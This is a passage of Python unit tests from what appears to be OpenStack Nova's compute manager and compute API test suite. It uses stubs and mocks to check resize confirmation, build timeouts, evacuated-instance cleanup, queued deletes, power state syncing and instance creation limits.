fake_instance.fake_db_instance(uuid='fake_uuid3',
vm_state=vm_states.ACTIVE,
task_state=
task_states.REBOOTING),
fake_instance.fake_db_instance(uuid='fake_uuid4',
vm_state=vm_states.RESIZED,
task_state=None),
fake_instance.fake_db_instance(uuid='fake_uuid5',
vm_state=vm_states.ACTIVE,
task_state=None),
fake_instance.fake_db_instance(uuid='fake_uuid6',
vm_state=vm_states.RESIZED,
task_state='deleting')]
expected_migration_status = {'fake_uuid1': 'confirmed',
'noexist': 'error',
'fake_uuid2': 'error',
'fake_uuid3': 'error',
'fake_uuid4': None,
'fake_uuid5': 'error',
'fake_uuid6': 'error'}
migrations = []
for i, instance in enumerate(instances, start=1):
fake_mig = test_migration.fake_db_migration()
fake_mig.update({'id': i,
'instance_uuid': instance['uuid'],
'status': None})
migrations.append(fake_mig)
def fake_instance_get_by_uuid(context, instance_uuid,
columns_to_join=None):
self.assertIn('metadata', columns_to_join)
self.assertIn('system_metadata', columns_to_join)
# raise InstanceNotFound exception for uuid 'noexist'
if instance_uuid == 'noexist':
raise exception.InstanceNotFound(instance_id=instance_uuid)
for instance in instances:
if instance['uuid'] == instance_uuid:
return instance
def fake_migration_get_unconfirmed_by_dest_compute(context,
resize_confirm_window, dest_compute):
self.assertEqual(dest_compute, CONF.host)
return migrations
def fake_migration_update(context, mid, updates):
for migration in migrations:
if migration['id'] == mid:
migration.update(updates)
return migration
def fake_confirm_resize(context, instance, migration=None):
# raise exception for 'fake_uuid4' to check migration status
# does not get set to 'error' on confirm_resize failure.
if instance['uuid'] == 'fake_uuid4':
raise test.TestingException('bomb')
self.assertNotEqual(migration, None)
for migration2 in migrations:
if (migration2['instance_uuid'] ==
migration['instance_uuid']):
migration2['status'] = 'confirmed'
self.stubs.Set(db, 'instance_get_by_uuid',
fake_instance_get_by_uuid)
self.stubs.Set(db, 'migration_get_unconfirmed_by_dest_compute',
fake_migration_get_unconfirmed_by_dest_compute)
self.stubs.Set(db, 'migration_update', fake_migration_update)
self.stubs.Set(self.compute.compute_api, 'confirm_resize',
fake_confirm_resize)
def fetch_instance_migration_status(instance_uuid):
for migration in migrations:
if migration['instance_uuid'] == instance_uuid:
return migration['status']
self.flags(resize_confirm_window=60)
ctxt = context.get_admin_context()
self.compute._poll_unconfirmed_resizes(ctxt)
for uuid, status in expected_migration_status.iteritems():
self.assertEqual(status, fetch_instance_migration_status(uuid))
def test_instance_build_timeout_disabled(self):
self.flags(instance_build_timeout=0)
ctxt = context.get_admin_context()
called = {'get_all': False, 'set_error_state': 0}
created_at = timeutils.utcnow() + datetime.timedelta(seconds=-60)
def fake_instance_get_all_by_filters(context, filters, *args, **kw):
called['get_all'] = True
self.assertIn('host', filters)
self.assertEqual(kw['columns_to_join'], [])
return instances[:]
self.stubs.Set(db, 'instance_get_all_by_filters',
fake_instance_get_all_by_filters)
def fake_set_instance_error_state(_ctxt, instance_uuid, **kwargs):
called['set_error_state'] += 1
self.stubs.Set(self.compute, '_set_instance_error_state',
fake_set_instance_error_state)
instance_map = {}
instances = []
for x in xrange(5):
uuid = 'fake-uuid-%s' % x
instance_map[uuid] = {'uuid': uuid, 'host': CONF.host,
'vm_state': vm_states.BUILDING,
'created_at': created_at}
instances.append(instance_map[uuid])
self.compute._check_instance_build_time(ctxt)
self.assertFalse(called['get_all'])
self.assertEqual(called['set_error_state'], 0)
def test_instance_build_timeout(self):
self.flags(instance_build_timeout=30)
ctxt = context.get_admin_context()
called = {'get_all': False, 'set_error_state': 0}
created_at = timeutils.utcnow() + datetime.timedelta(seconds=-60)
def fake_instance_get_all_by_filters(*args, **kwargs):
called['get_all'] = True
return instances[:]
self.stubs.Set(db, 'instance_get_all_by_filters',
fake_instance_get_all_by_filters)
def fake_set_instance_error_state(_ctxt, instance_uuid, **kwargs):
called['set_error_state'] += 1
self.stubs.Set(self.compute, '_set_instance_error_state',
fake_set_instance_error_state)
instance_map = {}
instances = []
for x in xrange(5):
uuid = 'fake-uuid-%s' % x
instance_map[uuid] = {'uuid': uuid, 'host': CONF.host,
'vm_state': vm_states.BUILDING,
'created_at': created_at}
instances.append(instance_map[uuid])
self.compute._check_instance_build_time(ctxt)
self.assertTrue(called['get_all'])
self.assertEqual(called['set_error_state'], 5)
def test_instance_build_timeout_mixed_instances(self):
self.flags(instance_build_timeout=30)
ctxt = context.get_admin_context()
called = {'get_all': False, 'set_error_state': 0}
created_at = timeutils.utcnow() + datetime.timedelta(seconds=-60)
def fake_instance_get_all_by_filters(*args, **kwargs):
called['get_all'] = True
return instances[:]
self.stubs.Set(db, 'instance_get_all_by_filters',
fake_instance_get_all_by_filters)
def fake_set_instance_error_state(_ctxt, instance_uuid, **kwargs):
called['set_error_state'] += 1
self.stubs.Set(self.compute, '_set_instance_error_state',
fake_set_instance_error_state)
instance_map = {}
instances = []
        # expired instances
for x in xrange(4):
uuid = 'fake-uuid-%s' % x
instance_map[uuid] = {'uuid': uuid, 'host': CONF.host,
'vm_state': vm_states.BUILDING,
'created_at': created_at}
instances.append(instance_map[uuid])
        # not expired
uuid = 'fake-uuid-5'
instance_map[uuid] = {
'uuid': uuid,
'host': CONF.host,
'vm_state': vm_states.BUILDING,
'created_at': timeutils.utcnow(),
}
instances.append(instance_map[uuid])
self.compute._check_instance_build_time(ctxt)
self.assertTrue(called['get_all'])
self.assertEqual(called['set_error_state'], 4)
def test_get_resource_tracker_fail(self):
self.assertRaises(exception.NovaException,
self.compute._get_resource_tracker,
'invalidnodename')
def test_instance_update_host_check(self):
# make sure rt usage doesn't happen if the host or node is different
def fail_get(nodename):
raise test.TestingException(_("wrong host/node"))
self.stubs.Set(self.compute, '_get_resource_tracker', fail_get)
instance = self._create_fake_instance({'host': 'someotherhost'})
self.compute._instance_update(self.context, instance['uuid'])
instance = self._create_fake_instance({'node': 'someothernode'})
self.compute._instance_update(self.context, instance['uuid'])
params = {'host': 'someotherhost', 'node': 'someothernode'}
instance = self._create_fake_instance(params)
self.compute._instance_update(self.context, instance['uuid'])
def test_destroy_evacuated_instance_on_shared_storage(self):
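        # An instance already evacuated to another host is destroyed
        # locally; with shared storage its disks are left in place.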
fake_context = context.get_admin_context()
# instances in central db
instances = [
# those are still related to this host
jsonutils.to_primitive(self._create_fake_instance(
{'host': self.compute.host})),
jsonutils.to_primitive(self._create_fake_instance(
{'host': self.compute.host})),
jsonutils.to_primitive(self._create_fake_instance(
{'host': self.compute.host}))
]
        # this one has already been evacuated to another host
evacuated_instance = self._create_fake_instance({'host': 'otherhost'})
instances.append(evacuated_instance)
self.mox.StubOutWithMock(self.compute,
'_get_instances_on_driver')
self.mox.StubOutWithMock(self.compute,
'_get_instance_nw_info')
self.mox.StubOutWithMock(self.compute,
'_get_instance_volume_block_device_info')
self.mox.StubOutWithMock(self.compute,
'_is_instance_storage_shared')
self.mox.StubOutWithMock(self.compute.driver, 'destroy')
self.compute._get_instances_on_driver(
fake_context, {'deleted': False}).AndReturn(instances)
self.compute._get_instance_nw_info(fake_context,
evacuated_instance).AndReturn(
'fake_network_info')
self.compute._get_instance_volume_block_device_info(
fake_context, evacuated_instance).AndReturn('fake_bdi')
self.compute._is_instance_storage_shared(fake_context,
evacuated_instance).AndReturn(True)
self.compute.driver.destroy(evacuated_instance,
'fake_network_info',
'fake_bdi',
False)
self.mox.ReplayAll()
self.compute._destroy_evacuated_instances(fake_context)
def test_destroy_evacuated_instance_with_disks(self):
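        # With non-shared storage, the evacuated instance's local disks
        # are destroyed as well.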
fake_context = context.get_admin_context()
# instances in central db
instances = [
# those are still related to this host
jsonutils.to_primitive(self._create_fake_instance(
{'host': self.compute.host})),
jsonutils.to_primitive(self._create_fake_instance(
{'host': self.compute.host})),
jsonutils.to_primitive(self._create_fake_instance(
{'host': self.compute.host}))
]
        # this one has already been evacuated to another host
evacuated_instance = self._create_fake_instance({'host': 'otherhost'})
instances.append(evacuated_instance)
self.mox.StubOutWithMock(self.compute,
'_get_instances_on_driver')
self.mox.StubOutWithMock(self.compute,
'_get_instance_nw_info')
self.mox.StubOutWithMock(self.compute,
'_get_instance_volume_block_device_info')
self.mox.StubOutWithMock(self.compute.driver,
'check_instance_shared_storage_local')
self.mox.StubOutWithMock(self.compute.compute_rpcapi,
'check_instance_shared_storage')
self.mox.StubOutWithMock(self.compute.driver,
'check_instance_shared_storage_cleanup')
self.mox.StubOutWithMock(self.compute.driver, 'destroy')
self.compute._get_instances_on_driver(
fake_context, {'deleted': False}).AndReturn(instances)
self.compute._get_instance_nw_info(fake_context,
evacuated_instance).AndReturn(
'fake_network_info')
self.compute._get_instance_volume_block_device_info(
fake_context, evacuated_instance).AndReturn('fake_bdi')
self.compute.driver.check_instance_shared_storage_local(fake_context,
evacuated_instance).AndReturn({'filename': 'tmpfilename'})
self.compute.compute_rpcapi.check_instance_shared_storage(fake_context,
evacuated_instance,
{'filename': 'tmpfilename'}).AndReturn(False)
self.compute.driver.check_instance_shared_storage_cleanup(fake_context,
{'filename': 'tmpfilename'})
self.compute.driver.destroy(evacuated_instance,
'fake_network_info',
'fake_bdi',
True)
self.mox.ReplayAll()
self.compute._destroy_evacuated_instances(fake_context)
def test_destroy_evacuated_instance_not_implemented(self):
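        # If the driver cannot check for shared storage, assume it is not
        # shared and destroy the local disks too.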
fake_context = context.get_admin_context()
# instances in central db
instances = [
# those are still related to this host
jsonutils.to_primitive(self._create_fake_instance(
{'host': self.compute.host})),
jsonutils.to_primitive(self._create_fake_instance(
{'host': self.compute.host})),
jsonutils.to_primitive(self._create_fake_instance(
{'host': self.compute.host}))
]
        # this one has already been evacuated to another host
evacuated_instance = self._create_fake_instance({'host': 'otherhost'})
instances.append(evacuated_instance)
self.mox.StubOutWithMock(self.compute,
'_get_instances_on_driver')
self.mox.StubOutWithMock(self.compute,
'_get_instance_nw_info')
self.mox.StubOutWithMock(self.compute,
'_get_instance_volume_block_device_info')
self.mox.StubOutWithMock(self.compute.driver,
'check_instance_shared_storage_local')
self.mox.StubOutWithMock(self.compute.compute_rpcapi,
'check_instance_shared_storage')
self.mox.StubOutWithMock(self.compute.driver,
'check_instance_shared_storage_cleanup')
self.mox.StubOutWithMock(self.compute.driver, 'destroy')
self.compute._get_instances_on_driver(
fake_context, {'deleted': False}).AndReturn(instances)
self.compute._get_instance_nw_info(fake_context,
evacuated_instance).AndReturn(
'fake_network_info')
self.compute._get_instance_volume_block_device_info(
fake_context, evacuated_instance).AndReturn('fake_bdi')
self.compute.driver.check_instance_shared_storage_local(fake_context,
evacuated_instance).AndRaise(NotImplementedError())
self.compute.driver.destroy(evacuated_instance,
'fake_network_info',
'fake_bdi',
True)
self.mox.ReplayAll()
self.compute._destroy_evacuated_instances(fake_context)
def test_complete_partial_deletion(self):
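        # Ensure _complete_partial_deletion destroys an instance that is
        # in the DELETED vm_state but not yet marked deleted in the DB.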
admin_context = context.get_admin_context()
instance = {
'id': '1',
'vm_state': vm_states.DELETED,
'task_state': None,
'system_metadata': [{'key': 'fake_key', 'value': 'fake_value'}],
'vcpus': 1,
'memory_mb': 1,
'project_id': 'fake-prj',
'user_id': 'fake-user',
'deleted': 0
}
def fake_conductor(context, instance):
instance['deleted'] = instance['id']
self.stubs.Set(self.compute.conductor_api,
'instance_destroy',
fake_conductor)
self.stubs.Set(self.compute,
'_get_instance_volume_bdms',
lambda *a, **k: None)
self.stubs.Set(self.compute,
'_complete_deletion',
lambda *a, **k: None)
self.stubs.Set(quotas_obj.Quotas, 'reserve', lambda *a, **k: None)
self.compute._complete_partial_deletion(admin_context, instance)
        self.assertNotEqual(0, instance['deleted'])
def test_init_instance_for_partial_deletion(self):
admin_context = context.get_admin_context()
instance = {'id': '1',
'vm_state': vm_states.DELETED,
'deleted': 0
}
def fake_partial_deletion(context, instance):
instance['deleted'] = instance['id']
self.stubs.Set(self.compute,
'_complete_partial_deletion',
fake_partial_deletion)
self.compute._init_instance(admin_context, instance)
        self.assertNotEqual(0, instance['deleted'])
def test_partial_deletion_raise_exception(self):
admin_context = context.get_admin_context()
instance = {'id': '1',
'vm_state': vm_states.DELETED,
'deleted': 0
}
self.mox.StubOutWithMock(self.compute, '_complete_partial_deletion')
self.compute._complete_partial_deletion(
admin_context, instance).AndRaise(ValueError)
self.mox.ReplayAll()
self.compute._init_instance(admin_context, instance)
def test_add_remove_fixed_ip_updates_instance_updated_at(self):
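        # Adding or removing a fixed IP should bump the instance's
        # updated_at timestamp each time.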
def _noop(*args, **kwargs):
pass
self.stubs.Set(self.compute.network_api,
'add_fixed_ip_to_instance', _noop)
self.stubs.Set(self.compute.network_api,
'remove_fixed_ip_from_instance', _noop)
instance = self._create_fake_instance()
updated_at_1 = instance['updated_at']
self.compute.add_fixed_ip_to_instance(self.context, 'fake', instance)
instance = db.instance_get_by_uuid(self.context, instance['uuid'])
updated_at_2 = instance['updated_at']
self.compute.remove_fixed_ip_from_instance(self.context, 'fake',
instance)
instance = db.instance_get_by_uuid(self.context, instance['uuid'])
updated_at_3 = instance['updated_at']
updated_ats = (updated_at_1, updated_at_2, updated_at_3)
self.assertEqual(len(updated_ats), len(set(updated_ats)))
def test_no_pending_deletes_for_soft_deleted_instances(self):
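        # A soft-deleted instance must not be cleaned up by
        # _run_pending_deletes.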
self.flags(reclaim_instance_interval=0)
ctxt = context.get_admin_context()
instance = self._create_fake_instance(
params={'host': CONF.host,
'vm_state': vm_states.SOFT_DELETED,
'deleted_at': timeutils.utcnow()})
self.compute._run_pending_deletes(ctxt)
instance = db.instance_get_by_uuid(self.context, instance['uuid'])
self.assertFalse(instance['cleaned'])
def test_reclaim_queued_deletes(self):
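        # Only the soft-deleted instance past the reclaim interval should
        # be deleted; active, recently deleted and restoring instances are
        # left alone.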
self.flags(reclaim_instance_interval=3600)
ctxt = context.get_admin_context()
# Active
self._create_fake_instance(params={'host': CONF.host})
# Deleted not old enough
self._create_fake_instance(params={'host': CONF.host,
'vm_state': vm_states.SOFT_DELETED,
'deleted_at': timeutils.utcnow()})
# Deleted old enough (only this one should be reclaimed)
deleted_at = (timeutils.utcnow() -
datetime.timedelta(hours=1, minutes=5))
instance = self._create_fake_instance(
params={'host': CONF.host,
'vm_state': vm_states.SOFT_DELETED,
'deleted_at': deleted_at})
# Restoring
# NOTE(hanlind): This specifically tests for a race condition
# where restoring a previously soft deleted instance sets
# deleted_at back to None, causing reclaim to think it can be
# deleted, see LP #1186243.
self._create_fake_instance(
params={'host': CONF.host,
'vm_state': vm_states.SOFT_DELETED,
'task_state': task_states.RESTORING})
self.mox.StubOutWithMock(self.compute, '_delete_instance')
self.compute._delete_instance(ctxt, mox.IsA(instance_obj.Instance), [])
self.mox.ReplayAll()
self.compute._reclaim_queued_deletes(ctxt)
def test_reclaim_queued_deletes_continue_on_error(self):
# Verify that reclaim continues on error.
self.flags(reclaim_instance_interval=3600)
ctxt = context.get_admin_context()
deleted_at = (timeutils.utcnow() -
datetime.timedelta(hours=1, minutes=5))
instance1 = self._create_fake_instance_obj(
params={'host': CONF.host,
'vm_state': vm_states.SOFT_DELETED,
'deleted_at': deleted_at})
instance2 = self._create_fake_instance_obj(
params={'host': CONF.host,
'vm_state': vm_states.SOFT_DELETED,
'deleted_at': deleted_at})
instances = []
instances.append(instance1)
instances.append(instance2)
self.mox.StubOutWithMock(instance_obj.InstanceList,
'get_by_filters')
self.mox.StubOutWithMock(self.compute, '_deleted_old_enough')
self.mox.StubOutWithMock(self.compute.conductor_api,
'block_device_mapping_get_all_by_instance')
self.mox.StubOutWithMock(self.compute, '_delete_instance')
instance_obj.InstanceList.get_by_filters(
ctxt, mox.IgnoreArg(),
expected_attrs=instance_obj.INSTANCE_DEFAULT_FIELDS
).AndReturn(instances)
# The first instance delete fails.
self.compute._deleted_old_enough(instance1, 3600).AndReturn(True)
self.compute.conductor_api.block_device_mapping_get_all_by_instance(
ctxt, instance1).AndReturn(None)
self.compute._delete_instance(ctxt, instance1,
None).AndRaise(test.TestingException)
# The second instance delete that follows.
self.compute._deleted_old_enough(instance2, 3600).AndReturn(True)
self.compute.conductor_api.block_device_mapping_get_all_by_instance(
ctxt, instance2).AndReturn(None)
self.compute._delete_instance(ctxt, instance2,
None)
self.mox.ReplayAll()
self.compute._reclaim_queued_deletes(ctxt)
def test_sync_power_states(self):
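        # Sync the power state of every instance on this host with what
        # the driver reports.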
ctxt = self.context.elevated()
self._create_fake_instance({'host': self.compute.host})
self._create_fake_instance({'host': self.compute.host})
self._create_fake_instance({'host': self.compute.host})
self.mox.StubOutWithMock(self.compute.driver, 'get_info')
self.mox.StubOutWithMock(self.compute, '_sync_instance_power_state')
# Check to make sure task continues on error.
self.compute.driver.get_info(mox.IgnoreArg()).AndRaise(
exception.InstanceNotFound(instance_id='fake-uuid'))
self.compute._sync_instance_power_state(ctxt, mox.IgnoreArg(),
power_state.NOSTATE).AndRaise(
exception.InstanceNotFound(instance_id='fake-uuid'))
self.compute.driver.get_info(mox.IgnoreArg()).AndReturn(
{'state': power_state.RUNNING})
self.compute._sync_instance_power_state(ctxt, mox.IgnoreArg(),
power_state.RUNNING)
self.compute.driver.get_info(mox.IgnoreArg()).AndReturn(
{'state': power_state.SHUTDOWN})
self.compute._sync_instance_power_state(ctxt, mox.IgnoreArg(),
power_state.SHUTDOWN)
self.mox.ReplayAll()
self.compute._sync_power_states(ctxt)
def _test_lifecycle_event(self, lifecycle_event, power_state):
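        # Helper: a driver lifecycle event should trigger a power state
        # sync with the mapped power state; None means no sync is expected.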
instance = self._create_fake_instance()
uuid = instance['uuid']
self.mox.StubOutWithMock(self.compute, '_sync_instance_power_state')
        if power_state is not None:
self.compute._sync_instance_power_state(
mox.IgnoreArg(),
mox.ContainsKeyValue('uuid', uuid),
power_state)
self.mox.ReplayAll()
self.compute.handle_events(event.LifecycleEvent(uuid, lifecycle_event))
self.mox.VerifyAll()
self.mox.UnsetStubs()
def test_lifecycle_events(self):
self._test_lifecycle_event(event.EVENT_LIFECYCLE_STOPPED,
power_state.SHUTDOWN)
self._test_lifecycle_event(event.EVENT_LIFECYCLE_STARTED,
power_state.RUNNING)
self._test_lifecycle_event(event.EVENT_LIFECYCLE_PAUSED,
power_state.PAUSED)
self._test_lifecycle_event(event.EVENT_LIFECYCLE_RESUMED,
power_state.RUNNING)
self._test_lifecycle_event(-1, None)
def test_lifecycle_event_non_existent_instance(self):
# No error raised for non-existent instance because of inherent race
# between database updates and hypervisor events. See bug #1180501.
event_instance = event.LifecycleEvent('does-not-exist',
event.EVENT_LIFECYCLE_STOPPED)
self.compute.handle_events(event_instance)
def test_allow_confirm_resize_on_instance_in_deleting_task_state(self):
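        # Confirming a resize should still succeed when the instance is
        # already in the DELETING task state.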
instance = self._create_fake_instance_obj()
old_type = flavors.extract_flavor(instance)
new_type = flavors.get_flavor_by_flavor_id('4')
sys_meta = instance.system_metadata
sys_meta = flavors.save_flavor_info(sys_meta,
old_type, 'old_')
sys_meta = flavors.save_flavor_info(sys_meta,
new_type, 'new_')
sys_meta = flavors.save_flavor_info(sys_meta,
new_type)
fake_rt = self.mox.CreateMockAnything()
def fake_drop_resize_claim(*args, **kwargs):
pass
def fake_get_resource_tracker(self):
return fake_rt
def fake_setup_networks_on_host(self, *args, **kwargs):
pass
self.stubs.Set(fake_rt, 'drop_resize_claim', fake_drop_resize_claim)
self.stubs.Set(self.compute, '_get_resource_tracker',
fake_get_resource_tracker)
self.stubs.Set(self.compute.network_api, 'setup_networks_on_host',
fake_setup_networks_on_host)
migration = migration_obj.Migration()
migration.instance_uuid = instance.uuid
migration.status = 'finished'
migration.create(self.context.elevated())
instance.task_state = task_states.DELETING
instance.vm_state = vm_states.RESIZED
instance.system_metadata = sys_meta
instance.save()
self.compute.confirm_resize(self.context, instance=instance,
migration=migration)
instance.refresh()
self.assertEqual(vm_states.ACTIVE, instance['vm_state'])
def _get_instance_and_bdm_for_dev_defaults_tests(self):
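        # Helper: build an instance with a root device name and a single
        # bootable volume block device mapping.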
instance = self._create_fake_instance(
params={'root_device_name': '/dev/vda'})
block_device_mapping = [
{'id': 3, 'instance_uuid': 'fake-instance',
'device_name': '/dev/vda',
'source_type': 'volume',
'destination_type': 'volume',
'image_id': 'fake-image-id-1',
'boot_index': 0}]
return instance, block_device_mapping
def test_default_block_device_names_empty_instance_root_dev(self):
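        # When the instance has no root_device_name it is taken from the
        # boot BDM and persisted via _instance_update.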
instance, bdms = self._get_instance_and_bdm_for_dev_defaults_tests()
instance['root_device_name'] = None
self.mox.StubOutWithMock(self.compute, '_instance_update')
self.mox.StubOutWithMock(self.compute,
'_default_device_names_for_instance')
self.compute._instance_update(self.context, instance['uuid'],
root_device_name='/dev/vda')
self.compute._default_device_names_for_instance(instance,
'/dev/vda',
mox.IgnoreArg(),
[], [], bdms)
self.mox.ReplayAll()
self.compute._default_block_device_names(self.context,
instance,
{}, bdms)
def test_default_block_device_names_empty_root_device(self):
instance, bdms = self._get_instance_and_bdm_for_dev_defaults_tests()
bdms[0]['device_name'] = None
self.mox.StubOutWithMock(self.compute.conductor_api,
'block_device_mapping_update')
self.mox.StubOutWithMock(self.compute,
'_default_device_names_for_instance')
self.compute.conductor_api.block_device_mapping_update(
self.context, bdms[0]['id'], {'device_name': '/dev/vda'})
self.compute._default_device_names_for_instance(instance,
'/dev/vda',
mox.IgnoreArg(),
[], [], bdms)
self.mox.ReplayAll()
self.compute._default_block_device_names(self.context,
instance,
{}, bdms)
def test_default_block_device_names_no_root_device(self):
instance, bdms = self._get_instance_and_bdm_for_dev_defaults_tests()
instance['root_device_name'] = None
bdms[0]['device_name'] = None
self.mox.StubOutWithMock(self.compute, '_instance_update')
self.mox.StubOutWithMock(self.compute.conductor_api,
'block_device_mapping_update')
self.mox.StubOutWithMock(self.compute,
'_default_root_device_name')
self.mox.StubOutWithMock(self.compute,
'_default_device_names_for_instance')
self.compute._default_root_device_name(instance, mox.IgnoreArg(),
bdms[0]).AndReturn('/dev/vda')
self.compute._instance_update(self.context, instance['uuid'],
root_device_name='/dev/vda')
self.compute.conductor_api.block_device_mapping_update(
self.context, bdms[0]['id'], {'device_name': '/dev/vda'})
self.compute._default_device_names_for_instance(instance,
'/dev/vda',
mox.IgnoreArg(),
[], [], bdms)
self.mox.ReplayAll()
self.compute._default_block_device_names(self.context,
instance,
{}, bdms)
class ComputeAPITestCase(BaseTestCase):
def setUp(self):
def fake_get_nw_info(cls, ctxt, instance):
self.assertTrue(ctxt.is_admin)
return fake_network.fake_get_instance_nw_info(self.stubs, 1, 1)
super(ComputeAPITestCase, self).setUp()
self.stubs.Set(network_api.API, 'get_instance_nw_info',
fake_get_nw_info)
self.security_group_api = (
openstack_driver.get_openstack_security_group_driver())
self.compute_api = compute.API(
security_group_api=self.security_group_api)
self.fake_image = {
'id': 1,
'name': 'fake_name',
'status': 'active',
'properties': {'kernel_id': 'fake_kernel_id',
'ramdisk_id': 'fake_ramdisk_id'},
}
def fake_show(obj, context, image_id):
if image_id:
return self.fake_image
else:
raise exception.ImageNotFound(image_id=image_id)
self.fake_show = fake_show
def _run_instance(self, params=None):
instance = jsonutils.to_primitive(self._create_fake_instance(params,
services=True))
instance_uuid = instance['uuid']
self.compute.run_instance(self.context, instance=instance)
instance = db.instance_get_by_uuid(self.context, instance_uuid)
self.assertEqual(instance['task_state'], None)
return instance, instance_uuid
def test_create_with_too_little_ram(self):
# Test an instance type with too little memory.
inst_type = flavors.get_default_flavor()
inst_type['memory_mb'] = 1
self.fake_image['min_ram'] = 2
self.stubs.Set(fake_image._FakeImageService, 'show', self.fake_show)
self.assertRaises(exception.InstanceTypeMemoryTooSmall,
self.compute_api.create, self.context,
inst_type, self.fake_image['id'])
# Now increase the inst_type memory and make sure all is fine.
inst_type['memory_mb'] = 2
(refs, resv_id) = self.compute_api.create(self.context,
inst_type, self.fake_image['id'])
db.instance_destroy(self.context, refs[0]['uuid'])
def test_create_with_too_little_disk(self):
# Test an instance type with too little disk space.
inst_type = flavors.get_default_flavor()
inst_type['root_gb'] = 1
self.fake_image['min_disk'] = 2
self.stubs.Set(fake_image._FakeImageService, 'show', self.fake_show)
self.assertRaises(exception.InstanceTypeDiskTooSmall,
self.compute_api.create, self.context,
inst_type, self.fake_image['id'])
# Now increase the inst_type disk space and make sure all is fine.
inst_type['root_gb'] = 2
(refs, resv_id) = self.compute_api.create(self.context,
inst_type, self.fake_image['id'])
db.instance_destroy(self.context, refs[0]['uuid'])
def test_create_with_too_large_image(self):
        # Test an image that is too large for the instance type's root disk.
inst_type = flavors.get_default_flavor()
inst_type['root_gb'] = 1
self.fake_image['size'] = '1073741825'
self.stubs.Set(fake_image._FakeImageService, 'show', self.fake_show)
self.assertRaises(exception.InstanceTypeDiskTooSmall,
self.compute_api.create, self.context,
inst_type, self.fake_image['id'])
# Reduce image to 1 GB limit and ensure it works
self.fake_image['size'] = '1073741824'
(refs, resv_id) = self.compute_api.create(self.context,
inst_type, self.fake_image['id'])
db.instance_destroy(self.context, refs[0]['uuid'])
def test_create_just_enough_ram_and_disk(self):
# Test an instance type with just enough ram and disk space.
inst_type = flavors.get_default_flavor()
inst_type['root_gb'] = 2
inst_type['memory_mb'] = 2
self.fake_image['min_ram'] = 2
self.fake_image['min_disk'] = 2
self.fake_image['name'] = 'fake_name'
self.stubs.Set(fake_image._FakeImageService, 'show', self.fake_show)
(refs, resv_id) = self.compute_api.create(self.context,
inst_type, self.fake_image['id'])
db.instance_destroy(self.context, refs[0]['uuid'])
def test_create_with_no_ram_and_disk_reqs(self):
# Test an instance type with no min_ram or min_disk.
inst_type = flavors.get_default_flavor()
inst_type['root_gb'] = 1
inst_type['memory_mb'] = 1
self.stubs.Set(fake_image._FakeImageService, 'show', self.fake_show)
(refs, resv_id) = self.compute_api.create(self.context,
inst_type, self.fake_image['id'])
db.instance_destroy(self.context, refs[0]['uuid'])
def test_create_with_deleted_image(self):
# If we're given a deleted image by glance, we should not be able to
# build from it
inst_type = flavors.get_default_flavor()
self.fake_image['name'] = 'fake_name'
self.fake_image['status'] = 'DELETED'
self.stubs.Set(fake_image._FakeImageService, 'show', self.fake_show)
expected_message = (
exception.ImageNotActive.msg_fmt % {'image_id':
self.fake_image['id']})
with testtools.ExpectedException(exception.ImageNotActive,
expected_message):
self.compute_api.create(self.context, inst_type,
self.fake_image['id'])
def test_create_instance_defaults_display_name(self):
        # Verify that a default display_name is generated when none is given.
cases = [dict(), dict(display_name=None)]
for instance in cases:
(ref, resv_id) = self.compute_api.create(self.context,
flavors.get_default_flavor(),
'fake-image-uuid', **instance)
try:
self.assertNotEqual(ref[0]['display_name'], None)
finally:
db.instance_destroy(self.context, ref[0]['uuid'])
def test_create_instance_sets_system_metadata(self):
# Make sure image properties are copied into system metadata.
(ref, resv_id) = self.compute_api.create(
self.context,
instance_type=flavors.get_default_flavor(),
image_href='fake-image-uuid')
try:
sys_metadata = db.instance_system_metadata_get(self.context,
ref[0]['uuid'])
image_props = {'image_kernel_id': 'fake_kernel_id',
'image_ramdisk_id': 'fake_ramdisk_id',
'image_something_else': 'meow', }
for key, value in image_props.iteritems():
self.assertTrue(key in sys_metadata)
self.assertEqual(value, sys_metadata[key])
finally:
db.instance_destroy(self.context, ref[0]['uuid'])
def test_create_saves_type_in_system_metadata(self):
instance_type = flavors.get_default_flavor()
(ref, resv_id) = self.compute_api.create(
self.context,
instance_type=instance_type,
image_href='some-fake-image')
try:
sys_metadata = db.instance_system_metadata_get(self.context,
ref[0]['uuid'])
instance_type_props = ['name', 'memory_mb', 'vcpus', 'root_gb',
'ephemeral_gb', 'flavorid', 'swap',
'rxtx_factor', 'vcpu_weight']
for key in instance_type_props:
sys_meta_key = "instance_type_%s" % key
self.assertTrue(sys_meta_key in sys_metadata)
self.assertEqual(str(instance_type[key]),
str(sys_metadata[sys_meta_key]))
finally:
db.instance_destroy(self.context, ref[0]['uuid'])
def test_create_instance_associates_security_groups(self):
# Make sure create associates security groups.
group = self._create_group()
(ref, resv_id) = self.compute_api.create(
self.context,
instance_type=flavors.get_default_flavor(),
image_href='some-fake-image',
security_group=['testgroup'])
try:
self.assertEqual(len(db.security_group_get_by_instance(
self.context, ref[0]['uuid'])), 1)
group = db.security_group_get(self.context, group['id'])
self.assertTrue(len(group['instances']) == 1)
finally:
db.security_group_destroy(self.context, group['id'])
db.instance_destroy(self.context, ref[0]['uuid'])
def test_create_instance_with_invalid_security_group_raises(self):
instance_type = flavors.get_default_flavor()
pre_build_len = len(db.instance_get_all(self.context))
self.assertRaises(exception.SecurityGroupNotFoundForProject,
self.compute_api.create,
self.context,
instance_type=instance_type,
image_href=None,
security_group=['this_is_a_fake_sec_group'])
self.assertEqual(pre_build_len,
len(db.instance_get_all(self.context)))
def test_create_with_large_user_data(self):
# Test an instance type with too much user data.
inst_type = flavors.get_default_flavor()
self.fake_image['min_ram'] = 2
self.stubs.Set(fake_image._FakeImageService, 'show', self.fake_show)
self.assertRaises(exception.InstanceUserDataTooLarge,
self.compute_api.create, self.context, inst_type,
self.fake_image['id'], user_data=('1' * 65536))
def test_create_with_malformed_user_data(self):
# Test an instance type with malformed user data.
inst_type = flavors.get_default_flavor()
self.fake_image['min_ram'] = 2
self.stubs.Set(fake_image._FakeImageService, 'show', self.fake_show)
self.assertRaises(exception.InstanceUserDataMalformed,
self.compute_api.create, self.context, inst_type,
self.fake_image['id'], user_data='banana')
def test_create_with_base64_user_data(self):
        # Test an instance with an acceptable amount of user data.
inst_type = flavors.get_default_flavor()
self.fake_image['min_ram'] = 2
self.stubs.Set(fake_image._FakeImageService, 'show', self.fake_show)
# NOTE(mikal): a string of length 48510 encodes to 65532 characters of
# base64
(refs, resv_id) = self.compute_api.create(
self.context, inst_type, self.fake_image['id'],
user_data=base64.encodestring('1' * 48510))
db.instance_destroy(self.context, refs[0]['uuid'])
def test_populate_instance_for_create(self):
